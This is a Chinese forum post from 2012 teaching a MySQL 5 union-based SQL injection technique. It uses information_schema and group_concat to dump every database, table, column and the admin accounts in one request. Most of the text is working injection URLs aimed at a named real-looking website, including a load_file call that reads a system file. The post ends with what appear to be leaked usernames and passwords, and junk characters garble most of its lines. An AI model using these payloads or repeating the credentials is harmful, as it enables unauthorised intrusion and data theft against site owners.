此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
# D3 p" h/ r3 ~0 S但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人9 L& M6 k7 t3 l( G9 W
2 @$ d" Z% S! | L
, c# T( b- R+ T) ^* t( O/ M0 P
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入4 d/ r" d0 q) o" b5 Z9 M4 u) r
4 ^/ w6 d! H5 w- x% A* G( p1 c& f& ~
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
1 Q* i- F& ?! l2 z% u7 s% e5 k+ v% V$ H
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
' M" o h; g1 W- @6 b在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等' U# n1 w: M& h" _8 C* D
: U) J& Z; P4 Q$ \9 b+ Khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17( Q/ I _' a) h- O
$ V6 o; f" T$ m
读出所有库:3 N! m& _. h% K1 b4 k
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
% F+ d* V; C( Y( P- B+ a4 f& z) z
- k1 ]" b- x9 T( ]4 z- w
0 p1 c) Y# z2 ~9 z读出所有表:4 P# P9 H7 {8 `
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()( d7 @$ H6 S( m
/ c, k% Y+ Z7 E! Z; e读出所有表字段:
( P- o+ Q! \9 Thttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
" g4 y. m9 D$ n& j- |*/ (97,100,109,105,110)为admin的ascii码 依次类推! t. `) o) C s1 F! S, I
- Z+ F" h: F: Y) K* ~; x8 c: e读出所有表字段里的内容:
1 k- x2 K- N& O$ {- mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin2 P# p2 W* Y* y4 k6 H$ Z
3 ~, }- O0 T0 Q3 w+ s4 q; E3 ?# n. S+ [/ x$ {0 E; Y
! y7 }9 H) [' G1 D V( U. I1 W5 n
, ^) R! h0 @ z- h1 o1 m- ^ _8 ]" g( ?. e6 J. g
8 T1 n2 q8 K9 ^6 O
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
( o- ~+ g8 p% O" F
# |$ i2 s5 h8 @ M! y0 n1 ?
& V" [( `- B$ k0 s3 `9 ]http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
- q+ o& r, U2 s1 |- ~% z7 g# C$ C* S0 W
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
. N8 ?+ `4 W6 N2 E
; ?3 Q% H. W) a3 g- ^* W
5 g* C0 h" t" n) S3 whttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
8 ^9 {! f" ]4 R- W4 g) x0 h
' R+ D# e% N3 {* S! d9 ~8 {0 W8 {; y/ _/ g/ ^, O% r& A
webmaster:dzb521123,simlab:simadmin20043233
) O, S: }9 j5 x; r g |
发表于 2012-9-13 16:37:34
收藏
支持
反对